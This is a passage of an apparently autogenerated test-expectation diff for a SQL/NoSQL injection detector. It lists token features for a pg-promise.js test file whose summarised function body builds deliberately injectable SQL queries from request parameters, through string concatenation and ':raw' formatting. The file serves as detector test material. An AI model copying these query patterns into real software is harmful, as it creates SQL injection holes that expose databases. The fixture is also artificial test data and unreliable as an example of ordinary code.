contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:11:40:16 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:11:40:16 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:11:40:16 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:11:40:16 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:18:40:21 | name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:18:40:21 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:18:40:21 | name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:18:40:21 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:18:40:21 | name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:9 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:9 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:9 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:9 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:9 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:16 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:16 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:16 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:16 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:16 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:7:41:20 | req.params.foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:11:41:16 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:11:41:16 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:11:41:16 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:11:41:16 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:11:41:16 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:18:41:20 | foo | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:18:41:20 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:18:41:20 | foo | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:18:41:20 | foo | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:41:18:41:20 | foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:44:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | exceptional return of db.one( ... }\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | exceptional return of db.one( ... }\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | exceptional return of db.one( ... }\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | exceptional return of db.one( ... }\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:3:50:4 | exceptional return of db.one( ... }\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:6:44:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:6:44:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:6:44:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:6:44:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:6:44:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:10:50:3 | {\\n t ... }\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:10:50:3 | {\\n t ... }\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:10:50:3 | {\\n t ... }\\n } | calleeImports | pg-promise | @@ -3759,6 +18403,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:10:50:3 | {\\n t ... }\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:10:50:3 | {\\n t ... }\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:44:10:50:3 | {\\n t ... }\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:8 | text | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:8 | text | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:8 | text | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:8 | text | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:5:45:70 | text: ' ... {name}' | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:11:45:70 | 'SELECT ... {name}' | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:11:45:70 | 'SELECT ... {name}' | InputAccessPathFromCallee | 0.text | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:11:45:70 | 'SELECT ... {name}' | InputArgumentIndex | 0 | @@ -3769,6 +18428,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:11:45:70 | 'SELECT ... {name}' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:11:45:70 | 'SELECT ... {name}' | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:45:11:45:70 | 'SELECT ... {name}' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:46:10 | values | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:46:10 | values | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:46:10 | values | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:46:10 | values | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:46:10 | values | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:5:49:5 | values: ... n\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:13:49:5 | {\\n ... n\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:13:49:5 | {\\n ... n\\n } | InputAccessPathFromCallee | 0.values | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:13:49:5 | {\\n ... n\\n } | InputArgumentIndex | 0 | @@ -3779,6 +18453,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:13:49:5 | {\\n ... n\\n } | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query 